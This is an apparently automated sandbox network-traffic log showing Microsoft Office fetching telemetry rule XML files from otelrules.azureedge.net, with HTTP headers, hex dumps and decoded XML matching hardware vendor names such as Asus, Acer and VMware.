                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            23192.168.2.54973313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:22 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                            x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133922Z-16547b76f7fdf69shC1DFWcpd000000006h000000000fxcs
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:22 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            24192.168.2.54973613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:23 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:23 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                            x-ms-request-id: bfc5cfc9-a01e-0070-0546-2e573b000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133923Z-15869dbbcc6lq45jhC1DFW7zwg000000073g000000008p0x
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            25192.168.2.54973913.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:23 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:24 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 464
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                            x-ms-request-id: bf748f03-f01e-001f-5f5f-2e5dc8000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133923Z-17df447cdb5c9wvxhC1DFWn08n000000031g000000005468
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            26192.168.2.54973813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:23 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:23 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                            x-ms-request-id: 6bd3c087-001e-000b-13fd-2c15a7000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133923Z-16547b76f7f9bs6dhC1DFWt3rg00000006k000000000geep
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            27192.168.2.54973513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:23 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:23 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                            x-ms-request-id: e16c3d14-801e-00a3-050a-2d7cfb000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133923Z-16547b76f7fkcrm9hC1DFWxdag00000006qg00000000ghcb
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            28192.168.2.54973713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:23 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:23 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                            x-ms-request-id: 183719b9-d01e-00a1-43c3-2c35b1000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133923Z-16547b76f7fnlcwwhC1DFWz6gw00000006w0000000004asd
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            29192.168.2.54974113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:24 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                            x-ms-request-id: 764b7f95-c01e-00a1-1c00-2d7e4a000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133924Z-16547b76f7fm7xw6hC1DFW5px400000006ng000000007cyk
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            30192.168.2.54974213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:24 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                            x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133924Z-16547b76f7fsjlq8hC1DFWehq000000006h000000000649q
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            31192.168.2.54974013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:25 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                            x-ms-request-id: 11ffd83c-b01e-003d-6a61-2ed32c000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133925Z-15869dbbcc6qwghvhC1DFWssds00000002y000000000cmhm
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
